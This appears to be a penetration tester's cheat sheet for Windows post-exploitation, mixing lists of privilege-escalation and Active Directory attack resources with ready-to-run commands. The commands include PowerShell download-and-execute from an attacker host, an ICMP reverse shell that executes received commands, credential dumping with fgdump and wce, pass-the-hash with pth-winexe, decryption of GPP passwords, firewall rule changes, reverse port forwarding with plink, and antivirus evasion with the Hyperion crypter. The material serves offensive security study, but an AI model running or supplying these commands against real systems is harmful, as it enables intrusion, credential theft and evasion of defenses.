_Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator (or as a Power User in Windows) leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access.” _
— Indiana University (Best practices for computer security)
This is the phase I like to refer to as second pass enumeration or enumeration from the inside. Now that we've gained a foothold into the network it is crucial to run all of our enumeration from the ground up as an inside actor.
Windows Privilege Escalation Fundamentals - FuzzySecurity
Windows PrivEsc Check - GitHub
Windows Exploit Suggester - GitHub
Encyclopaedia Of Windows Privilege Escalation - YouTube
Level Up! Practical Windows Privilege Escalation - YouTube
Windows Privilege Escalation methods for PenTesters
Windows Attacks At is the new Black - YouTube
Analyizing local privilege escalations in win2k
The System Challenge - Decoder's Blog
The Wallstreet of Windows Binaries
Windows Operating System Archaeology
Breaking .NET Through Serialization
Windows Kernel Exploits - GitHub
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
Kali> python pyinstaller.py --onefile file.py
Kali> cp /usr/share/windows-binaries/nc.exe
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt
Exploitation Techniques and Mitigations on Windows
Authentication Registry Keys - MSDN
Demystifying AppContainers in Windows 8 Part 1
Protected Processes in Windows
Intercepting System Calls on x86_64 Windows
Introduction to Windows Kernel Security
Windows Program Automatic Startup Locations
Demystifying the Windows Firewall
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Bypassing Firewalls with Port 23
Pass the hash is dead long live LocalAccountTokenFilterPolicy
Getting Windows to play with itself: A PenTester's guide to Windows API abuse
Compromise as a Service: our pleAZURE
Resources
Attacking ADFS Endpoints with PowerShell
PowerShell Secrets and Tactics
An Intro to PowerShell and how to use it for Evil
Offensive Active Directory with PowerShell
Low-Level Windows API Access From PowerShell - FuzzySecurity
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
C:\> powershell.exe -ExecutionPolicy Bypass ‐NoLogo ‐NonInteractive ‐NoProfile ‐File wget.ps1
C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1
C:\> Get-Item /path/to/file.zip -Stream *
C:\> Get-ACL C:\path\to\file\or\directory
# TCP
# Setup TCP Listener ie: netcat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.TcpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie")$client.Send($packet, $packet.Length);$client.Close();'
# UDP
# Setup UDP Listener ie: socat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.UdpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'
# ICMP
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -Command '$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send("10.10.14.42", 500, $packet, $options);'
Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
Windows Privilege Escalation via weak Service Permissions
The Art of Becoming TrustedInstaller
5 Ways to find Systems running domain admin processes
PenTesting Active Directory Environments: CrapMapExec
Active Directory Privilege Relationships: BloodHound
Active Directory Architecture - MSDN
A Week of Evading Microsoft ATA Day 1
Dumping a domains worth of passwords with mimikatz part 2
Attack Methods for gaining Domain Admin
Find AD users with empty passwords
Domain Trusts and why you should care
A PenTester's guide to group scoping
How to own any Windows network with group policy hijacking attacks
[Kerberos Golden Ticket Protection](https://cert.europa.eu/static/WhitePapers/UPDATED - CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf)
How to pass the ticket through SSH tunnels
From Pass the Hash to Pass the Ticket with no pain
Abusing Token Privileges for LPE
Dump windows password hashes efficiently part 1
I'll get your credentials... Later! - FuzzySecurity
Grab the Windows Secrets! - Decoder's Blog
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
C:\> wce -w
You need to be an admin already it copies an executable to an admin share and registers a service and starts it
Lateral Movement with Invoke-PsExec
Anatomy of UAC Attacks - FuzzySecurity
Elevating privileges by exploiting weak folder permissions
C:\> icacls example.exe
C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt
Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes
SMB Relay demystified and NTLMv2 Pwnage with Python
Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.
Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd
# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automtion.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1
# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name ="httptunnel_client" dir=in action=allow program="httptunnel_client.exe enable=yes
C:\> netsh advfirewall firewall add rule name ="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080 dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe
# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000
# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe